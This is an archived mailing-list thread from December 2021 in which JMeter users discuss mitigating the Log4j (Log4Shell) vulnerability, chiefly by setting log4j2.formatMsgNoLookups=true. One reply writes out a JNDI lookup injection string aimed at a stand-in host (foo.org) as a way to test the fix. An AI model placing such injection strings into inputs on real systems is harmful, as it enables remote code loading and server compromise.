Re: Jmeter Log4J

2021-12-15 Thread Mariusz W 
 I mean, the setting works. Try (without setting) to build a plan that has
header: User-Agent: $ {jndi: ldap: //foo.org/attack} in the http header
manager in http sampler and execute the script. The script hangs and after
a few dozen seconds you will  see ConnectException to the foo.org server in
the console logs. The risk of someone attacking you in JMeter in this way
is small (you must follow an unknown plan).

Mariusz

On Wed, 15 Dec 2021 at 18:43, Yevgeniy Grimaylo
 wrote:

> Hello,
>
> Would you please clarify, how adding the next line to *system.properties*
> file (lives in "bin" folder of your JMeter installation), mitigate security
> risk with log4j2 ?
>
>
>
> Thanks,
>
> Yevgeniy Grimaylo
>
>
>
> *From: *Mariusz W 
> *Reply-To: *JMeter Users List 
> *Date: *Wednesday, December 15, 2021 at 4:09 AM
> *To: *JMeter Users List 
> *Subject: *Re: Jmeter Log4J
>
>
>
> I tested it and it works:)
>
> *-Dlog4j2.formatMsgNoLookups=true*
>
>
>
> Regards,
>
> Mariusz
>
>
>
> On Tue, 14 Dec 2021 at 16:45, Dmitri T  wrote:
>
> It should be sufficient to add the next line to *system.properties* file
> (lives in "bin" folder of your JMeter installation)
>
> *log4j2.formatMsgNoLookups=true*
>
> or pass this property via -D command-line argument like:
>
> *jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .*
>
> More information:
>
>- Constants.java from log4j 2.13.3
>
> <https://urldefense.com/v3/__https:/github.com/apache/logging-log4j2/blob/log4j-2.13.3/log4j-core/src/main/java/org/apache/logging/log4j/core/util/Constants.java*L63__;Iw!!A4F2R9G_pg!Mv2_eh9t63s3rXK_r7PgpdiuSD9ZV3AOd5CP0g2hgyursYjcOCQrvIL-W77C8f29VI3_Cm6v8A$>
>- Configuring JMeter
>
> <https://urldefense.com/v3/__https:/jmeter.apache.org/usermanual/get-started.html*configuring_jmeter__;Iw!!A4F2R9G_pg!Mv2_eh9t63s3rXK_r7PgpdiuSD9ZV3AOd5CP0g2hgyursYjcOCQrvIL-W77C8f29VI2hUuyepA$>
>- Apache JMeter Properties Customization Guide
>
> <https://urldefense.com/v3/__https:/www.blazemeter.com/blog/apache-jmeter-properties-customization__;!!A4F2R9G_pg!Mv2_eh9t63s3rXK_r7PgpdiuSD9ZV3AOd5CP0g2hgyursYjcOCQrvIL-W77C8f29VI12lFankQ$>
>- Overriding Properties Via The Command Line
>
> <https://urldefense.com/v3/__https:/jmeter.apache.org/usermanual/get-started.html*override__;Iw!!A4F2R9G_pg!Mv2_eh9t63s3rXK_r7PgpdiuSD9ZV3AOd5CP0g2hgyursYjcOCQrvIL-W77C8f29VI1ZvHFyQw$>
>
>
>
> On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:
>
> Hi Team,
>
>
>
> With the recent vulnerabilities identified on Apache Log4j on 10th
> December, I wanted to know if there will be a new version of the Apache
> JMeter planned with the latest log4j versions.
>
>
>
> With the organization security policy, there will be a scan on the log4j.
> We know this will not have any impact with the vulnerability identified,
> but to provide the InfoSec team, with a confirmation email from the
> provider will be a added confidence.
>
>
>
> Thanks in advance.
>
>
>
> Thanks, and Regards,
> Smruti Ranjan Roul
> Technical Lead- *QA*
>
>
> First American (India) Private Limited
> “Aveda Meta”, No.184, Old Madras Road,
> Opp. Swami Vivekanand Metro Station,
> Indiranagar, Bangalore-560038, Karnataka, India
>
> Mobile   : + 91 8880138672
> Email : sranjanr...@firstam.com
>
>
>
>
>
>
>
>
>
>
> **
> This message may contain confidential or proprietary information intended
> only for the use of the addressee(s) named above or may contain information
> that is legally privileged.
> If you are not the intended addressee, or the person responsible for
> delivering it to the intended addressee, you are hereby notified that
> reading, disseminating, distributing or copying this message is strictly
> prohibited.
> If you have received this message by mistake, please immediately notify us
> by replying to the message and delete the original message and any copies
> immediately thereafter.
>
> If you received this email as a commercial message and would like to opt
> out of future commercial messages, please let us know and we will remove
> you from our distribution list.
>
> Thank you.
>
> **
> FAFLD
>
>

Re: Jmeter Log4J

2021-12-15 Thread Yevgeniy Grimaylo 
Hello,
Would you please clarify, how adding the next line to system.properties file 
(lives in "bin" folder of your JMeter installation), mitigate security risk 
with log4j2 ?

Thanks,
Yevgeniy Grimaylo

From: Mariusz W 
Reply-To: JMeter Users List 
Date: Wednesday, December 15, 2021 at 4:09 AM
To: JMeter Users List 
Subject: Re: Jmeter Log4J

I tested it and it works:)
-Dlog4j2.formatMsgNoLookups=true

Regards,
Mariusz

On Tue, 14 Dec 2021 at 16:45, Dmitri T 
mailto:glin...@live.com>> wrote:

It should be sufficient to add the next line to system.properties file (lives 
in "bin" folder of your JMeter installation)

log4j2.formatMsgNoLookups=true

or pass this property via -D command-line argument like:

jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .

More information:

  *   Constants.java from log4j 
2.13.3<https://urldefense.com/v3/__https:/github.com/apache/logging-log4j2/blob/log4j-2.13.3/log4j-core/src/main/java/org/apache/logging/log4j/core/util/Constants.java*L63__;Iw!!A4F2R9G_pg!Mv2_eh9t63s3rXK_r7PgpdiuSD9ZV3AOd5CP0g2hgyursYjcOCQrvIL-W77C8f29VI3_Cm6v8A$>
  *   Configuring 
JMeter<https://urldefense.com/v3/__https:/jmeter.apache.org/usermanual/get-started.html*configuring_jmeter__;Iw!!A4F2R9G_pg!Mv2_eh9t63s3rXK_r7PgpdiuSD9ZV3AOd5CP0g2hgyursYjcOCQrvIL-W77C8f29VI2hUuyepA$>
  *   Apache JMeter Properties Customization 
Guide<https://urldefense.com/v3/__https:/www.blazemeter.com/blog/apache-jmeter-properties-customization__;!!A4F2R9G_pg!Mv2_eh9t63s3rXK_r7PgpdiuSD9ZV3AOd5CP0g2hgyursYjcOCQrvIL-W77C8f29VI12lFankQ$>
  *   Overriding Properties Via The Command 
Line<https://urldefense.com/v3/__https:/jmeter.apache.org/usermanual/get-started.html*override__;Iw!!A4F2R9G_pg!Mv2_eh9t63s3rXK_r7PgpdiuSD9ZV3AOd5CP0g2hgyursYjcOCQrvIL-W77C8f29VI1ZvHFyQw$>


On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:
Hi Team,

With the recent vulnerabilities identified on Apache Log4j on 10th December, I 
wanted to know if there will be a new version of the Apache JMeter planned with 
the latest log4j versions.

With the organization security policy, there will be a scan on the log4j. We 
know this will not have any impact with the vulnerability identified, but to 
provide the InfoSec team, with a confirmation email from the provider will be a 
added confidence.

Thanks in advance.

Thanks, and Regards,
Smruti Ranjan Roul
Technical Lead- QA
[cid:image001.jpg@01D7F1B1.430C8B80]
First American (India) Private Limited
“Aveda Meta”, No.184, Old Madras Road,
Opp. Swami Vivekanand Metro Station,
Indiranagar, Bangalore-560038, Karnataka, India
Mobile   : + 91 8880138672
Email : sranjanr...@firstam.com<mailto:sranjanr...@firstam.com>




**
This message may contain confidential or proprietary information intended only 
for the use of the addressee(s) named above or may contain information that is 
legally privileged.
If you are not the intended addressee, or the person responsible for delivering 
it to the intended addressee, you are hereby notified that reading, 
disseminating, distributing or copying this message is strictly prohibited.
If you have received this message by mistake, please immediately notify us by 
replying to the message and delete the original message and any copies 
immediately thereafter.

If you received this email as a commercial message and would like to opt out of 
future commercial messages, please let us know and we will remove you from our 
distribution list.

Thank you.
**
FAFLD

Re: Jmeter Log4J

2021-12-15 Thread Mariusz W 
I tested it and it works:)
*-Dlog4j2.formatMsgNoLookups=true*

Regards,
Mariusz

On Tue, 14 Dec 2021 at 16:45, Dmitri T  wrote:

> It should be sufficient to add the next line to *system.properties* file
> (lives in "bin" folder of your JMeter installation)
>
> *log4j2.formatMsgNoLookups=true*
>
> or pass this property via -D command-line argument like:
>
> *jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .*
>
> More information:
>
>- Constants.java from log4j 2.13.3
>
> 
>- Configuring JMeter
>
>- Apache JMeter Properties Customization Guide
>
>- Overriding Properties Via The Command Line
>
>
>
> On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:
>
> Hi Team,
>
>
>
> With the recent vulnerabilities identified on Apache Log4j on 10th
> December, I wanted to know if there will be a new version of the Apache
> JMeter planned with the latest log4j versions.
>
>
>
> With the organization security policy, there will be a scan on the log4j.
> We know this will not have any impact with the vulnerability identified,
> but to provide the InfoSec team, with a confirmation email from the
> provider will be a added confidence.
>
>
>
> Thanks in advance.
>
>
>
> Thanks, and Regards,
> Smruti Ranjan Roul
> Technical Lead- *QA*
>
>
> First American (India) Private Limited
> “Aveda Meta”, No.184, Old Madras Road,
> Opp. Swami Vivekanand Metro Station,
> Indiranagar, Bangalore-560038, Karnataka, India
>
> Mobile   : + 91 8880138672
> Email : sranjanr...@firstam.com
>
>
>
>
>
>
>
>
>
> **
> This message may contain confidential or proprietary information intended
> only for the use of the addressee(s) named above or may contain information
> that is legally privileged.
> If you are not the intended addressee, or the person responsible for
> delivering it to the intended addressee, you are hereby notified that
> reading, disseminating, distributing or copying this message is strictly
> prohibited.
> If you have received this message by mistake, please immediately notify us
> by replying to the message and delete the original message and any copies
> immediately thereafter.
>
> If you received this email as a commercial message and would like to opt
> out of future commercial messages, please let us know and we will remove
> you from our distribution list.
>
> Thank you.
>
> **
> FAFLD
>
>

Re: Jmeter Log4J

2021-12-14 Thread Valery Zabawski 
Thank you! Replacing files looks like the most easy way, so I’m going to give 
it a try.
Thanks to everyone for the reply. 

> 14 дек. 2021 г., в 18:54, Philippe Mouawad  
> написал(а):
> 
> 
> Hello,
> You can also read this:
> https://www.ubik-ingenierie.com/blog/jmeter-and-the-log4j2-vulnerability/
> 
> Regards
> 
>> On Tue, Dec 14, 2021 at 4:45 PM Dmitri T  wrote:
>> It should be sufficient to add the next line to system.properties file 
>> (lives in "bin" folder of your JMeter installation)
>> 
>> log4j2.formatMsgNoLookups=true
>> 
>> or pass this property via -D command-line argument like:
>> 
>> jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .
>> 
>> More information:
>> 
>> Constants.java from log4j 2.13.3
>> Configuring JMeter
>> Apache JMeter Properties Customization Guide
>> Overriding Properties Via The Command Line
>> 
>> 
>> On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:
>>> Hi Team,
>>> 
>>>  
>>> 
>>> With the recent vulnerabilities identified on Apache Log4j on 10th 
>>> December, I wanted to know if there will be a new version of the Apache 
>>> JMeter planned with the latest log4j versions.
>>> 
>>>  
>>> 
>>> With the organization security policy, there will be a scan on the log4j. 
>>> We know this will not have any impact with the vulnerability identified, 
>>> but to provide the InfoSec team, with a confirmation email from the 
>>> provider will be a added confidence.
>>> 
>>>  
>>> 
>>> Thanks in advance.
>>> 
>>>  
>>> 
>>> Thanks, and Regards,
>>> Smruti Ranjan Roul
>>> Technical Lead- QA
>>> 
>>> 
>>> First American (India) Private Limited
>>> “Aveda Meta”, No.184, Old Madras Road, 
>>> Opp. Swami Vivekanand Metro Station,
>>> Indiranagar, Bangalore-560038, Karnataka, India
>>> 
>>> Mobile   : + 91 8880138672
>>> Email : sranjanr...@firstam.com
>>> 
>>>  
>>> 
>>>  
>>> 
>>>  
>>> 
>>>  
>>> 
>>> **
>>> This message may contain confidential or proprietary information intended 
>>> only for the use of the addressee(s) named above or may contain information 
>>> that is legally privileged. 
>>> If you are not the intended addressee, or the person responsible for 
>>> delivering it to the intended addressee, you are hereby notified that 
>>> reading, disseminating, distributing or copying this message is strictly 
>>> prohibited. 
>>> If you have received this message by mistake, please immediately notify us 
>>> by replying to the message and delete the original message and any copies 
>>> immediately thereafter.
>>> 
>>> If you received this email as a commercial message and would like to opt 
>>> out of future commercial messages, please let us know and we will remove 
>>> you from our distribution list.
>>> 
>>> Thank you.
>>> **
>>> FAFLD
> 
> 
> -- 
> Cordialement
> Philippe M.
> Ubik-Ingenierie

Re: Jmeter Log4J

2021-12-14 Thread Philippe Mouawad 
Hello,
You can also read this:
https://www.ubik-ingenierie.com/blog/jmeter-and-the-log4j2-vulnerability/

Regards

On Tue, Dec 14, 2021 at 4:45 PM Dmitri T  wrote:

> It should be sufficient to add the next line to *system.properties* file
> (lives in "bin" folder of your JMeter installation)
>
> *log4j2.formatMsgNoLookups=true*
>
> or pass this property via -D command-line argument like:
>
> *jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .*
>
> More information:
>
>- Constants.java from log4j 2.13.3
>
> 
>- Configuring JMeter
>
>- Apache JMeter Properties Customization Guide
>
>- Overriding Properties Via The Command Line
>
>
>
> On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:
>
> Hi Team,
>
>
>
> With the recent vulnerabilities identified on Apache Log4j on 10th
> December, I wanted to know if there will be a new version of the Apache
> JMeter planned with the latest log4j versions.
>
>
>
> With the organization security policy, there will be a scan on the log4j.
> We know this will not have any impact with the vulnerability identified,
> but to provide the InfoSec team, with a confirmation email from the
> provider will be a added confidence.
>
>
>
> Thanks in advance.
>
>
>
> Thanks, and Regards,
> Smruti Ranjan Roul
> Technical Lead- *QA*
>
>
> First American (India) Private Limited
> “Aveda Meta”, No.184, Old Madras Road,
> Opp. Swami Vivekanand Metro Station,
> Indiranagar, Bangalore-560038, Karnataka, India
>
> Mobile   : + 91 8880138672
> Email : sranjanr...@firstam.com
>
>
>
>
>
>
>
>
>
> **
> This message may contain confidential or proprietary information intended
> only for the use of the addressee(s) named above or may contain information
> that is legally privileged.
> If you are not the intended addressee, or the person responsible for
> delivering it to the intended addressee, you are hereby notified that
> reading, disseminating, distributing or copying this message is strictly
> prohibited.
> If you have received this message by mistake, please immediately notify us
> by replying to the message and delete the original message and any copies
> immediately thereafter.
>
> If you received this email as a commercial message and would like to opt
> out of future commercial messages, please let us know and we will remove
> you from our distribution list.
>
> Thank you.
>
> **
> FAFLD
>
>

-- 
Cordialement
Philippe M.
Ubik-Ingenierie

Re: Jmeter Log4J

2021-12-14 Thread Dmitri T 
It should be sufficient to add the next line to /system.properties/ file 
(lives in "bin" folder of your JMeter installation)


*log4j2.formatMsgNoLookups=true*

or pass this property via -D command-line argument like:

*jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .*

More information:

 * Constants.java from log4j 2.13.3
   

 * Configuring JMeter
   
 * Apache JMeter Properties Customization Guide
   
 * Overriding Properties Via The Command Line
   


On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:


Hi Team,

With the recent vulnerabilities identified on Apache Log4j on 10^th 
December, I wanted to know if there will be a new version of the 
Apache JMeter planned with the latest log4j versions.


With the organization security policy, there will be a scan on the 
log4j. We know this will not have any impact with the vulnerability 
identified, but to provide the InfoSec team, with a confirmation email 
from the provider will be a added confidence.


Thanks in advance.

Thanks, and Regards,
Smruti Ranjan Roul
Technical Lead- *QA*


First American (India) Private Limited
“Aveda Meta”, No.184, Old Madras Road,
Opp. Swami Vivekanand Metro Station,
Indiranagar, Bangalore-560038, Karnataka, India

Mobile : + 91 8880138672
Email : sranjanr...@firstam.com 





**
This message may contain confidential or proprietary information 
intended only for the use of the addressee(s) named above or may 
contain information that is legally privileged.
If you are not the intended addressee, or the person responsible for 
delivering it to the intended addressee, you are hereby notified that 
reading, disseminating, distributing or copying this message is 
strictly prohibited.
If you have received this message by mistake, please immediately 
notify us by replying to the message and delete the original message 
and any copies immediately thereafter.


If you received this email as a commercial message and would like to 
opt out of future commercial messages, please let us know and we will 
remove you from our distribution list.


Thank you.
**
FAFLD

Jmeter Log4J

2021-12-14 Thread Smruti Ranjan Roul 
Hi Team,

With the recent vulnerabilities identified on Apache Log4j on 10th December, I 
wanted to know if there will be a new version of the Apache JMeter planned with 
the latest log4j versions.

With the organization security policy, there will be a scan on the log4j. We 
know this will not have any impact with the vulnerability identified, but to 
provide the InfoSec team, with a confirmation email from the provider will be a 
added confidence.

Thanks in advance.

Thanks, and Regards,
Smruti Ranjan Roul
Technical Lead- QA
[cid:image001.jpg@01D7F10B.DF73C700]
First American (India) Private Limited
"Aveda Meta", No.184, Old Madras Road,
Opp. Swami Vivekanand Metro Station,
Indiranagar, Bangalore-560038, Karnataka, India
Mobile   : + 91 8880138672
Email : sranjanr...@firstam.com




**
This message may contain confidential or proprietary information intended only 
for the use of the addressee(s) named above or may contain information that is 
legally privileged. 
If you are not the intended addressee, or the person responsible for delivering 
it to the intended addressee, you are hereby notified that reading, 
disseminating, distributing or copying this message is strictly prohibited. 
If you have received this message by mistake, please immediately notify us by 
replying to the message and delete the original message and any copies 
immediately thereafter.

If you received this email as a commercial message and would like to opt out of 
future commercial messages, please let us know and we will remove you from our 
distribution list.

Thank you.
**
FAFLD